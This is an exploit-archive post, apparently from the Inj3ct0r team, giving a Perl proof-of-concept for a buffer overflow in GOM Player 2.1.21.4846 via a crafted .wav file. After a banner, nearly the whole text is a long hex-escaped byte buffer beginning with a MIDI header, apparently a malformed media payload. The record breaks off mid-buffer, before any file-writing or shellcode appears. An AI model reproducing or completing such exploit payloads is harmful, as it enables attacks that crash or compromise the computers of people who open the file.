\____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />print "<br />[+]-------------------------------------------------------[+]<br />[+] GOM Player 2.1.21.4846 (.wav) Buffer Overflow Exploit [+]<br />[+] By : cr4wl3r [+]<br />[+]-------------------------------------------------------[+]<br />";<br /> <br /> <br /> <br />$buff =<br />"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x03\x00\xf0\x4d\x54\x72\x6b\x00\x00".<br />"\x00\x21\x00\xff\x51\x03\x0a\x2c\x2a\x00\xff\x58\x04\x02\x02\x18\x08\x00\xff\x03".<br />"\x08\x20\x20\x20\x20\x20\x20\x20\x20\x85\x88\x61\xff\x2f\x00\x4d\x54\x72\x6b\x00".<br />"\x00\x27\x6b\x00\xff\x03\x08\x41\x20\x42\x72\x65\x65\x7a\x65\x00\xc1\x07\x00\x07".<br />"\x82\x69\x91\x43\x3d\x00\x40\x3d\x64\x43\x00\x00\x40\x00\x13\x48\x3f\x00\x3f\x3f".<br />"\x65\x48\x00\x00\x3f\x00\x13\x45\x3f\x29\x45\x00\x13\x44\x3f\x29\x44\x00\x13\x45".<br />"\x65\x29\x45\x00\x13\x47\x3f\x29\x47\x00\x13\x48\x3f\x00\x40\x3f\x81\x21\x48\x00".<br />"\x00\x40\x00\x13\x43\x3f\x29\x43\x00\x13\x40\x3f\x29\x40\x00\x13\x3f\x3f\x29\x3f".<br />"\x00\x13\x40\x3f\x29\x40\x00\x13\x41\x3f\x29\x41\x00\x13\x43\x3f\x81\x21\x43\x00".<br />"\x13\x41\x3f\x29\x41\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3c\x3f\x29\x3c\x00\x13\x40".<br />"\x3f\x29\x40\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3b\x3f\x29\x3b\x00\x13\x39\x3f\x29".<br />"\x39\x00\x13\x37\x3f\x65\x37\x00\x81\x0c\x4f\x3d\x00\x4a\x3d\x00\x47\x3d\x00\x43".<br />"\x3d\x64\x4f\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00\x13\x43\x3f\x65\x43\x00\x13".<br />"\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00".<br />"\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40".<br />"\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13".<br />"\x42\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51".<br />"\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43".<br />"\x00\x13\x4e\x54\x00\x4b\x54\x00\x42\x54\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13".<br />"\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51".<br />"\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42".<br />"\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65".<br />"\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x41\x51".<br />"\x29\x41\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c".<br />"\x00\x13\x4f\x51\x00\x4c\x51\x01\x43\x64\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13".<br />"\x4d\x51\x00\x4a\x51\x00\x42\x64\x29\x4d\x00\x00\x4a\x00\x00\x42\x00\x13\x4f\x51".<br />"\x00\x4c\x51\x00\x43\x64\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4f\x51\x00\x43".<br />"\x51\x29\x4f\x00\x00\x43\x00\x13\x50\x51\x00\x44\x51\x01\x4d\x64\x28\x50\x00\x00".<br />"\x44\x00\x00\x4d\x00\x13\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00".<br />"\x00\x4d\x00\x13\x53\x51\x00\x47\x51\x00\x4d\x64\x65\x53\x00\x00\x47\x00\x00\x4d".<br />"\x00\x13\x4f\x51\x00\x43\x51\x00\x4d\x64\x29\x4f\x00\x00\x43\x00\x00\x4d\x00\x13".<br />"\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x51".<br />"\x00\x47\x51\x00\x4d\x64\x29\x53\x00\x00\x47\x00\x00\x4d\x00\x13\x54\x51\x00\x48".<br />"\x51\x00\x4c\x64\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x53\x51\x00\x47\x51\x00".<br />"\x4c\x64\x29\x53\x00\x00\x47\x00\x00\x4c\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64".<br />"\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x00\x4f\x64\x29\x58".<br />"\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x29\x58\x00\x00\x4c\x00\x00\x4f\x00\x13".<br />"\x57\x69\x00\x4b\x69\x29\x57\x00\x00\x4b\x00\x13\x58\x69\x00\x4c\x69\x65\x58\x00".<br />"\x00\x4c\x00\x13\x58\x69\x29\x58\x00\x13\x56\x69\x29\x56\x00\x13\x55\x69\x29\x55".<br />"\x00\x13\x56\x69\x65\x56\x00\x13\x54\x69\x00\x4c\x69\x29\x54\x00\x00\x4c\x00\x13".<br />"\x53\x69\x00\x4a\x69\x29\x53\x00\x00\x4a\x00\x13\x51\x69\x00\x48\x69\x29\x51\x00".<br />"\x00\x48\x00\x13\x4f\x69\x00\x47\x69\x82\x55\x4f\x00\x00\x47\x00\x13\x4d\x69\x00".<br />"\x4a\x69\x01\x47\x64\x00\x43\x64\x64\x4d\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00".<br />"\x13\x4c\x51\x00\x43\x51\x00\x48\x64\x29\x4c\x00\x00\x43\x00\x00\x48\x00\x13\x4b".<br />"\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00".<br />"\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00".<br />"\x13\x41\x51\x29\x41\x00\x13\x42\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48".<br />"\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43\x54\x64".<br />"\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4e\x54\x00\x4b\x54\x00\x42\x54\x29\x4e\x00".<br />"\x00\x4b\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00\x00\x4c".<br />"\x00\x00\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00".<br />"\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00".<br />"\x13\x43\x51\x65\x43\x00\x13\x46\x51\x29\x46\x00\x13\x45\x51\x29\x45\x00\x13\x44".<br />"\x51\x29\x44\x00\x13\x45\x51\x29\x45\x00\x13\x4a\x51\x29\x4a\x00\x13\x4d\x51\x29".<br />"\x4d\x00\x13\x51\x54\x00\x4d\x54\x01\x45\x54\x64\x51\x00\x00\x4d\x00\x00\x45\x00".<br />"\x13\x4d\x51\x29\x4d\x00\x13\x4a\x51\x29\x4a\x00\x13\x45\x51\x29\x45\x00\x13\x48".<br />"\x51\x00\x3e\x51\x65\x48\x00\x00\x3e\x00\x13\x45\x51\x29\x45\x00\x13\x43\x51\x29".<br />"\x43\x00\x13\x45\x51\x29\x45\x00\x13\x47\x51\x29\x47\x00\x13\x48\x51\x00\x40\x51".<br />"\x81\x21\x48\x00\x00\x40\x00\x13\x43\x51\x29\x43\x00\x13\x40\x51\x29\x40\x00\x13".<br />"\x3e\x51\x29\x3e\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x43\x51".<br />"\x81\x21\x43\x00\x13\x41\x51\x29\x41\x00\x13\x3e\x51\x29\x3e\x00\x13\x3d\x51\x29".<br />"\x3d\x00\x13\x40\x51\x29\x40\x00\x13\x3e\x51\x29\x3e\x00\x13\x3b\x51\x29\x3b\x00".<br />"\x13\x39\x51\x29\x39\x00\x13\x37\x51\x65\x37\x00\x81\x0c\x47\x51\x00\x43\x51\x64".<br />"\x47\x00\x00\x43\x00\x13\x43\x51\x65\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00".<br />"\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43".<br />"\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13".<br />"\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x42\x51\x29\x42\x00\x13\x43\x51".<br />"\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c".<br />"\x54\x01\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4e\x54\x00\x4b\x54\x00".<br />"\x42\x54\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54".<br />"\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43".<br />"\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29".<br />"\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51".<br />"\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x41\x51\x29\x41\x00\x13\x43\x51\x29\x43".<br />"\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01".<br />"\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x54\x00\x4a\x54\x00\x42\x54".<br />"\x29\x4d\x00\x00\x4a\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f".<br />"\x00\x00\x4c\x00\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x29\x4f\x00\x00\x43\x00\x13".<br />"\x50\x54\x00\x44\x54\x01\x4d\x54\x28\x50\x00\x00\x44\x00\x00\x4d\x00\x13\x51\x54".<br />"\x00\x45\x54\x00\x4d\x54\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x54\x00\x47".<br />"\x54\x00\x4d\x54\x65\x53\x00\x00\x47\x00\x00\x4d\x00\x13\x4f\x51\x00\x43\x51\x00".<br />"\x4d\x64\x29\x4f\x00\x00\x43\x00\x00\x4d\x00\x13\x51\x51\x00\x45\x51\x00\x4d\x64".<br />"\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x51\x00\x47\x51\x00\x4d\x64\x29\x53".<br />"\x00\x00\x47\x00\x00\x4d\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64\x29\x54\x00\x00".<br />"\x48\x00\x00\x4c\x00\x13\x53\x51\x00\x47\x51\x00\x4c\x64\x29\x53\x00\x00\x47\x00".<br />"\x00\x4c\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64\x29\x54\x00\x00\x48\x00\x00\x4c".<br />"\x00\x13\x58\x63\x00\x4c\x63\x00\x4f\x63\x29\x58\x00\x00\x4c\x00\x13\x58\x63\x00".<br />"\x4c\x63\x29\x58\x00\x00\x4c\x00\x00\x4f\x00\x13\x57\x69\x00\x4b\x69\x29\x57\x00".<br />"\x00\x4b\x00\x13\x58\x69\x00\x4c\x69\x65\x58\x00\x00\x4c\x00\x13\x58\x69\x29\x58".<br />"\x00\x13\x56\x69\x29\x56\x00\x13\x55\x69\x29\x55\x00\x13\x56\x69\x65\x56\x00\x13".<br />"\x54\x69\x00\x4c\x69\x29\x54\x00\x00\x4c\x00\x13\x53\x69\x00\x4a\x69\x29\x53\x00".<br />"\x00\x4a\x00\x13\x51\x69\x00\x48\x69\x29\x51\x00\x00\x48\x00\x13\x4f\x69\x00\x47".<br />"\x69\x82\x55\x4f\x00\x00\x47\x00\x13\x4d\x69\x00\x4a\x69\x01\x47\x64\x00\x43\x64".<br />"\x64\x4d\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00\x13\x4c\x60\x00\x43\x60\x00\x48".<br />"\x60\x29\x4c\x00\x00\x43\x00\x00\x48\x00\x13\x4b\x60\x00\x42\x60\x29\x4b\x00\x00".<br />"\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51".<br />"\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x42".<br />"\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29".<br />"\x4c\x00\x13\x4f\x51\x00\x4c\x51\x01\x43\x64\x64\x4f\x00\x00\x4c\x00\x00\x43\x00".<br />"\x13\x4e\x51\x00\x4b\x51\x00\x42\x64\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13\x4f".<br />"\x51\x00\x4c\x51\x00\x43\x64\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51\x00".<br />"\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00".<br />"\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x43\x51\x65\x43\x00\x13\x46".<br />"\x51\x29\x46\x00\x13\x45\x51\x29\x45\x00\x13\x44\x51\x29\x44\x00\x13\x45\x51\x29".<br />"\x45\x00\x13\x4a\x51\x29\x4a\x00\x13\x4d\x51\x29\x4d\x00\x13\x51\x57\x00\x4d\x57".<br />"\x01\x45\x57\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4d\x5d\x29\x4d\x00\x13\x4a".<br />"\x5a\x29\x4a\x00\x13\x45\x51\x29\x45\x00\x13\x45\x51\x29\x45\x00\x13\x44\x51\x29".<br />"\x44\x00\x13\x45\x51\x29\x45\x00\x13\x47\x51\x29\x47\x00\x13\x48\x51\x29\x48\x00".<br />"\x13\x47\x51\x29\x47\x00\x13\x48\x51\x29\x48\x00\x13\x4a\x51\x29\x4a\x00\x13\x4c\x51".<br />"\x65\x4c\x00\x13\x4d\x5a\x00\x49\x5a\x01\x43\x5a\x81\x5c\x4d\x00\x00\x49\x00\x00".<br />"\x43\x00\x13\x4c\x66\x00\x49\x66\x00\x43\x66\x65\x4c\x00\x00\x49\x00\x00\x43\x00".<br />"\x13\x4c\x66\x00\x48\x66\x00\x42\x66\x65\x4c\x00\x00\x48\x00\x00\x42\x00\x13\x4c".<br />"\x63\x00\x47\x63\x00\x41\x63\x81\x5d\x4c\x00\x00\x47\x00\x00\x41\x00\x13\x4a\x63".<br />"\x00\x47\x63\x00\x41\x63\x65\x4a\x00\x00\x47\x00\x00\x41\x00\x13\x48\x5d\x00\x40".<br />"\x5d\x65\x48\x00\x00\x40\x00\x14\x4f\x5d\x14\x4f\x00\x13\x51\x5d\x15\x51\x00\x13".<br />"\x53\x5a\x15\x53\x00\x14\x54\x5a\x00\x4c\x5a\x64\x54\x00\x00\x4c\x00\x81\x0c\x51".<br />"\x51\x00\x4d\x51\x00\x45\x64\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x51\x00".<br />"\x51\x51\x00\x48\x64\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x51\x00\x4d".<br />"\x51\x00\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x51\x00\x4d\x51\x00".<br />"\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x51\x00\x4c\x51\x00\x43\x64".<br />"\x82\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00".<br />"\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47\x51".<br />"\x29\x4a\x00\x00\x47\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d".<br />"\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00".<br />"\x4d\x00\x13\x51\x51\x00\x4d\x51\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c\x51".<br />"\x29\x4f\x00\x00\x4c\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c".<br />"\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00".<br />"\x4a\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51".<br />"\x65\x54\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x29\x54\x00\x00\x4c\x00\x13\x51".<br />"\x57\x00\x4d\x57\x01\x45\x57\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x60\x00".<br />"\x51\x60\x00\x48\x60\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x51\x00\x4d".<br />"\x51\x00\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x51\x00\x4d\x51\x00".<br />"\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x51\x00\x4c\x51\x00\x43\x64".<br />"\x82\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x54\x51\x00\x4c\x51\x00\x48\x64\x29".<br />"\x54\x00\x00\x4c\x00\x00\x48\x00\x13\x53\x51\x00\x4c\x51\x00\x47\x64\x29\x53\x00".<br />"\x00\x4c\x00\x00\x47\x00\x13\x51\x51\x00\x4c\x51\x00\x45\x64\x29\x51\x00\x00\x4c".<br />"\x00\x00\x45\x00\x13\x53\x51\x00\x4c\x51\x00\x47\x64\x29\x53\x00\x00\x4c\x00\x00".<br />"\x47\x00\x13\x54\x51\x00\x51\x51\x00\x48\x64\x29\x54\x00\x00\x51\x00\x00\x48\x00".<br />"\x13\x55\x51\x00\x51\x51\x00\x49\x64\x29\x55\x00\x00\x51\x00\x00\x49\x00\x13\x56".<br />"\x51\x00\x53\x51\x00\x51\x64\x00\x4a\x64\x29\x56\x00\x00\x53\x00\x00\x51\x00\x00".<br />"\x4a\x00\x13\x57\x51\x00\x53\x51\x00\x51\x64\x00\x4b\x64\x29\x57\x00\x00\x53\x00".<br />"\x00\x51\x00\x00\x4b\x00\x13\x58\x69\x00\x53\x69\x00\x50\x64\x00\x4c\x64\x65\x58".<br />"\x00\x00\x53\x00\x00\x50\x00\x00\x4c\x00\x81\x0c\x4f\x69\x00\x4c\x69\x00\x44\x64".<br />"\x81\x5c\x4f\x00\x00\x4c\x00\x00\x44\x00\x13\x51\x51\x00\x4d\x51\x00\x45\x64\x65".<br />"\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x51\x00\x51\x51\x00\x48\x64\x81\x5d\x54".<br />"\x00\x00\x51\x00\x00\x48\x00\x13\x51\x60\x00\x4d\x60\x00\x45\x60\x65\x51\x00\x00".<br />"\x4d\x00\x00\x45\x00\x13\x51\x5d\x00\x4d\x5d\x00\x45\x5d\x65\x51\x00\x00\x4d\x00".<br />"\x00\x45\x00\x13\x4f\x5a\x00\x4c\x5a\x00\x43\x5a\x82\x55\x4f\x00\x00\x4c\x00\x00".<br />"\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48\x51".<br />"\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47\x51\x29\x4a\x00\x00\x47\x00\x13\x4c".<br />"\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00".<br />"\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d\x00\x13\x51\x51\x00\x4d\x51".<br />"\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x4d".<br />"\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00".<br />"\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4f\x51\x00\x4c\x51".<br />"\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x65\x54\x00\x00\x4c\x00\x13\x54".<br />"\x51\x00\x4c\x51\x29\x54\x00\x00\x4c\x00\x13\x56\x51\x00\x4a\x51\x65\x56\x00\x00".<br />"\x4a\x00\x13\x56\x51\x00\x4a\x51\x81\x21\x56\x00\x00\x4a\x00\x13\x54\x51\x29\x54".<br />"\x00\x13\x53\x51\x29\x53\x00\x13\x51\x51\x29\x51\x00\x13\x51\x51\x00\x4c\x51\x65".<br />"\x51\x00\x00\x4c\x00\x13\x4f\x51\x00\x4c\x51\x81\x21\x4f\x00\x00\x4c\x00\x13\x48".<br />"\x51\x29\x48\x00\x13\x4a\x51\x29\x4a\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x51\x00".<br />"\x47\x51\x65\x4f\x00\x00\x47\x00\x13\x4d\x51\x00\x47\x51\x81\x5d\x4d\x00\x00\x47".<br />"\x00\x13\x47\x51\x00\x43\x51\x01\x41\x64\x64\x47\x00\x00\x43\x00\x00\x41\x00\x13".<br />"\x48\x51\x00\x43\x51\x65\x48\x00\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x29\x4f\x00".<br />"\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x29\x4f\x00\x00\x43\x00\x13\x4f\x51\x00\x43".<br />"\x51\x65\x4f\x00\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x65\x4f\x00\x00\x43\x00\x13".<br />"\x51\x57\x00\x4d\x57\x01\x45\x57\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x60".<br />"\x00\x51\x60\x00\x48\x60\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x68\x00".<br />"\x4d\x68\x00\x45\x68\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x63\x00\x4d\x63".<br />"\x00\x45\x63\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x60\x00\x4c\x60\x00\x43".<br />"\x60\x82\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00".<br />"\x00\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47".<br />"\x51\x29\x4a\x00\x00\x47\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13".<br />"\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00".<br />"\x00\x4d\x00\x13\x51\x51\x00\x4d\x51\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c".<br />"\x51\x29\x4f\x00\x00\x4c\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13".<br />"\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00".<br />"\x00\x4a\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c".<br />"\x51\x65\x54\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x29\x54\x00\x00\x4c\x00\x13".<br />"\x51\x51\x00\x4d\x51\x01\x45\x51\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x54".<br />"\x00\x51\x54\x00\x48\x54\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x5d\x00".<br />"\x4d\x5d\x00\x45\x5d\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x5d\x00\x4d\x5d".<br />"\x00\x45\x5d\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x5d\x00\x4c\x5d\x00\x43".<br />"\x5d\x82\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x54\x60\x00\x4c\x60\x00\x48\x60".<br />"\x29\x54\x00\x00\x4c\x00\x00\x48\x00\x13\x53\x60\x00\x4c\x60\x00\x47\x60\x29\x53".<br />"\x00\x00\x4c\x00\x00\x47\x00\x13\x51\x60\x00\x4c\x60\x00\x45\x60\x29\x51\x00\x00".<br />"\x4c\x00\x00\x45\x00\x13\x53\x60\x00\x4c\x60\x00\x47\x60\x29\x53\x00\x00\x4c\x00".<br />"\x00\x47\x00\x13\x54\x60\x00\x51\x60\x00\x48\x60\x29\x54\x00\x00\x51\x00\x00\x48".<br />"\x00\x13\x55\x63\x00\x51\x63\x00\x49\x63\x29\x55\x00\x00\x51\x00\x00\x49\x00\x13".<br />"\x56\x63\x00\x53\x63\x00\x51\x63\x00\x4a\x63\x29\x56\x00\x00\x53\x00\x00\x51\x00".<br />"\x00\x4a\x00\x13\x57\x63\x00\x53\x63\x00\x51\x63\x00\x4b\x63\x29\x57\x00\x00\x53".<br />"\x00\x00\x51\x00\x00\x4b\x00\x13\x58\x68\x00\x53\x68\x00\x50\x68\x00\x4c\x68\x65".<br />"\x58\x00\x00\x53\x00\x00\x50\x00\x00\x4c\x00\x81\x0c\x4f\x69\x00\x4c\x69\x00\x44".<br />"\x64\x81\x5c\x4f\x00\x00\x4c\x00\x00\x44\x00\x13\x51\x68\x00\x4d\x68\x00\x45\x68".<br />"\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x69\x00\x51\x69\x00\x48\x69\x81\x5d".<br />"\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x51\x00\x4d\x51\x00\x45\x64\x65\x51\x00".<br />"\x00\x4d\x00\x00\x45\x00\x13\x51\x51\x00\x4d\x51\x00\x45\x64\x65\x51\x00\x00\x4d".<br />"\x00\x00\x45\x00\x13\x4f\x51\x00\x4c\x51\x00\x43\x64\x82\x55\x4f\x00\x00\x4c\x00".<br />"\x00\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48".<br />"\x51\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47\x51\x29\x4a\x00\x00\x47\x00\x13".<br />"\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00".<br />"\x00\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d\x00\x13\x51\x51\x00\x4d".<br />"\x51\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13".<br />"\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00".<br />"\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4f\x51\x00\x4c".<br />"\x51\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x65\x54\x00\x00\x4c\x00\x13".<br />"\x54\x51\x00\x4c\x51\x29\x54\x00\x00\x4c\x00\x13\x56\x51\x00\x4a\x51\x65\x56\x00".<br />"\x00\x4a\x00\x13\x56\x51\x00\x4a\x51\x81\x21\x56\x00\x00\x4a\x00\x13\x54\x51\x29".<br />"\x54\x00\x13\x53\x51\x29\x53\x00\x13\x51\x51\x29\x51\x00\x13\x51\x51\x00\x4c\x51".<br />"\x65\x51\x00\x00\x4c\x00\x13\x4f\x51\x00\x4c\x51\x81\x21\x4f\x00\x00\x4c\x00\x13".<br />"\x48\x51\x29\x48\x00\x13\x4a\x51\x29\x4a\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x51".<br />"\x00\x47\x51\x65\x4f\x00\x00\x47\x00\x13\x4d\x51\x00\x47\x51\x81\x5d\x4d\x00\x00".<br />"\x47\x00\x13\x47\x5a\x00\x43\x5a\x01\x41\x5a\x64\x47\x00\x00\x43\x00\x00\x41\x00".<br />"\x13\x48\x66\x00\x43\x66\x00\x40\x66\x65\x48\x00\x00\x43\x00\x00\x40\x00\x81\x0c".<br 